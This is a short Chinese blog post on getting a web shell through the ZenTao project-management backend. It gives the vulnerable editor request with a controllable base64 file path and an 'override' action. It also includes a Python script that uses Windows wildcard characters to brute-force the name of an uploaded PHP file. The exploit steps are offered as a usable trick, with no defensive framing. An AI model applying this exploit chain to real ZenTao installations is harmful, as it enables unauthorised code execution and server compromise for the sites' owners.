禅道后台getshell,利用windows特性,快速确定文件名
首页 > web安全 > 小技巧    作者:webbaozi   2017年7月31日 16:40 星期一   热度:1108°   已自动提交收录  
时间:2017-7-31 16:40   热度:1108° 

如何上传文件请移步:http://www.webbaozi.com/dmsj/18.html

这里就不多讲了

window特性:

双引号(""") <==> 点号(".")';
大于符号(">") <==> 问号("?")';
小于符号("<") <==> 星号("*")';


进入正题:

index.php
?m=editor
&f=edit
&filePath=YWFh
&action=override
&isExtends=


filepath参数可控,填写绝对路径+base64编码

11.png

python生成字典(需自己构造):


#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64,string

s="D:/ZenTaoPMS/xampp/zentao/www/data/upload/1/201707/3114144004131ln"
s1="<<<<<<<<<<<<<<.php"

for word in string.lowercase:
    print base64.b64encode(s+word+s1)
for i in range(0,10):
    print base64.b64encode(s+str(i)+s1)


之后便可找到文件位置:

12.png


二维码加载中...
本文作者:webbaozi      文章标题: 禅道后台getshell,利用windows特性,快速确定文件名
本文地址:http://www.webbaozi.com/qjyq/76.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1